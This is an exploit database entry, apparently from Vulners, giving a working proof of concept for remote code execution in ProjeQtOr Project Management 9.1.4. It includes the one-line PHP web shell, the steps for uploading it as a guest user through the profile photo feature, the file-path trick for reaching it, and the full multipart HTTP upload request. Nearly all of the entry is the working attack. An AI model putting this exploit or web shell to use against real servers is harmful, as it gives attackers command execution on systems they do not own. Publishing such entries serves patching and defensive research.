Vulners
Lucene search
ProjeQtOr Project Management 9.1.4 - Remote Code Execution
# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
# Date: 29.05.2021
# Exploit Author: Temel Demir
# Vendor Homepage: https://www.projeqtor.org
# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
# Version: v9.1.4
# Tested on: Laragon @WIN10
# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.
PoC Process Step_by_Step:
# 1) Create a file with the below php code and save it as demir.pHp
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
# 2) Login to ProjeQtOr portal as guest user
# 3) Click -profile- button on header panel.
# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.
# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
# 6) As a last step you have to add the ".projeqtor" statement to the file extension.
You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]
Example Request:
POST /project/tool/saveAttachment.php HTTP/1.1
Host: ip:port
Content-Length: 1196
Accept: application/json
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Origin: http://ip:port/website_location/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://ip:port/website_location/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
Connection: close
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
Content-Type: application/octet-stream
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentId"
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentRefId"
($your_profile_id //edit)
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentType"
file
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentLink"
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentDescription"
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentPrivacy"
1
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4